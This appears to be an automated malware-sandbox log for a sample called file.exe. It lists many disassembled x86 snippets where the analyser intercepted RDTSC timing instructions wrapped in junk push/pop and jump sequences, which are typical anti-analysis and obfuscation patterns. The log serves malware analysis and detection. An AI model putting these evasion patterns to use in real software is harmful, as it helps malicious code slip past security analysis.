Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73050E second address: 730513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 730513 second address: 730529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F56AD341B20h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 730529 second address: 73052F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 735D3C second address: 735D46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F56AD341B1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739B26 second address: 739B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 jng 00007F56ACB76F38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 ja 00007F56ACB76F36h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739F8B second address: 739F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F56AD341B16h 0x0000000c jnl 00007F56AD341B16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A0FE second address: 73A10B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F56ACB76F38h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A3A6 second address: 73A3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edx 0x00000008 jbe 00007F56AD341B16h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A4DB second address: 73A4E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A61B second address: 73A639 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56AD341B26h 0x00000008 jbe 00007F56AD341B16h 0x0000000e jmp 00007F56AD341B1Ah 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73FCEF second address: 73FCF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73FCF4 second address: 73FCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73EA0F second address: 73EA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F56ACB76F36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73ECBF second address: 73ECC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73EF72 second address: 73EF7C instructions: 0x00000000 rdtsc 0x00000002 je 00007F56ACB76F36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711475 second address: 711479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F9C1 second address: 73F9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F56ACB76F36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F9D0 second address: 73F9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F9D6 second address: 73F9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F9DA second address: 73F9DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F9DE second address: 73FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F56ACB76F47h 0x0000000f pushad 0x00000010 jmp 00007F56ACB76F3Dh 0x00000015 jmp 00007F56ACB76F45h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CC348 second address: 6CC34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746629 second address: 74662F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74662F second address: 746633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716423 second address: 716440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716440 second address: 6F5C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F56AD341B16h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jp 00007F56AD341B27h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F56AD341B18h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov ecx, dword ptr [ebp+122D2A0Dh] 0x00000034 lea eax, dword ptr [ebp+12486166h] 0x0000003a call 00007F56AD341B1Ch 0x0000003f sub dword ptr [ebp+1245014Dh], eax 0x00000045 pop edi 0x00000046 movsx ecx, di 0x00000049 push eax 0x0000004a jmp 00007F56AD341B25h 0x0000004f mov dword ptr [esp], eax 0x00000052 mov dword ptr [ebp+1245067Ch], ebx 0x00000058 call dword ptr [ebp+122D2D4Ch] 0x0000005e push edi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716835 second address: 71684A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F56ACB76F38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71684A second address: 716850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716850 second address: 716854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716854 second address: 716858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716B6E second address: 716B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716B72 second address: 716B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F56AD341B1Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 716B9F second address: 716BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 717397 second address: 7173A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F56AD341B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7176E7 second address: 7176F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F56ACB76F36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7176F1 second address: 7176F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F66CF second address: 6F66E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007F56ACB76F36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F56ACB76F36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F66E7 second address: 6F66EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F66EB second address: 6F671D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F44h 0x00000007 jmp 00007F56ACB76F47h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7457F6 second address: 7457FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745D21 second address: 745D2B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F56ACB76F36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7461BA second address: 7461C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C06E second address: 74C099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Ch 0x00000007 jmp 00007F56ACB76F41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F56ACB76F36h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74AA40 second address: 74AA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F56AD341B25h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74AD41 second address: 74AD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B009 second address: 74B00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B00D second address: 74B013 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B013 second address: 74B04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a jmp 00007F56AD341B21h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F56AD341B26h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B04A second address: 74B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B1A9 second address: 74B1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B1AD second address: 74B1D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F56ACB76F46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B1D1 second address: 74B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B1D5 second address: 74B1D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B5D0 second address: 74B5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B5DB second address: 74B5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B761 second address: 74B770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jbe 00007F56AD341B16h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B8CA second address: 74B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F45h 0x00000009 pop esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74BA62 second address: 74BA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74BEF8 second address: 74BF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F56ACB76F36h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A6C3 second address: 74A6E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B25h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A6E3 second address: 74A6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A6EC second address: 74A705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752FA7 second address: 752FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752FAD second address: 752FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752FB1 second address: 752FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752FB5 second address: 752FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752FBE second address: 752FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752FC6 second address: 752FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 755D55 second address: 755D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 755D59 second address: 755D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F56AD341B25h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757D9B second address: 757DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F56ACB76F3Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757F53 second address: 757F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F56AD341B1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757F60 second address: 757F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757F64 second address: 757F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DB62 second address: 75DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F56ACB76F3Dh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e jl 00007F56ACB76F3Eh 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DB82 second address: 75DBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F56AD341B1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F56AD341B16h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DBA1 second address: 75DBB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DBB3 second address: 75DBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DBB9 second address: 75DBDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F56ACB76F47h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DBDA second address: 75DBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75DBF7 second address: 75DBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CE27 second address: 75CE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CE35 second address: 75CE3E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D152E second address: 6D153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F56AD341B2Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CFA0 second address: 75CFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F56ACB76F36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D26A second address: 75D26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D26E second address: 75D282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D282 second address: 75D294 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B1Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D294 second address: 75D29E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F56ACB76F36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D29E second address: 75D2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F56AD341B1Fh 0x0000000f push eax 0x00000010 jnp 00007F56AD341B16h 0x00000016 jmp 00007F56AD341B1Ch 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D421 second address: 75D442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56ACB76F49h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D442 second address: 75D44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D44A second address: 75D44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D5B4 second address: 75D5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D5BC second address: 75D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D70D second address: 75D717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F56AD341B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7662C8 second address: 7662CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7662CE second address: 7662D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764ED6 second address: 764EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764EDA second address: 764EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764EDE second address: 764EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
